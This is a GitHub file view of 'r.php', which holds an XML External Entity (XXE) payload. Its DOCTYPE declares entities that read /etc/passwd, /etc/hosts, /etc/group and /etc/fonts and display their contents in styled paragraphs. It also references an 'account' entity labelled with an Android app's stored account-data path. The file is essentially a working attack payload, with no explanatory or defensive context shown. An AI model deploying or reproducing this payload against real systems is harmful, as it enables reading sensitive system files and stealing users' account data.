-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathr.php
More file actions
33 lines (24 loc) · 645 Bytes
/
r.php
File metadata and controls
33 lines (24 loc) · 645 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?xml-stylesheet type="text/xml" href="https://sumsec.me"?>
<!DOCTYPE p [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY group SYSTEM "file://localhost/etc/group">
<!ENTITY fonts SYSTEM "file://etc/fonts">
]>
<p>
<p style="border-style: dotted;" >/etc/passwd:
&passwd;
</p >
<p style="border-style: dotted;" id ="hosts">/etc/hosts:
&hosts;
</p >
<p style="border-style: dotted;">/etc/group:
&group;
</p >
<p style="border-style: dotted;">/etc/fonts:
&fonts;
</p >
<p style="border-style: dotted;">/data/data/com.yiqixie.kem/files/mmkv/account_sdk:
&account;
</p >
</p >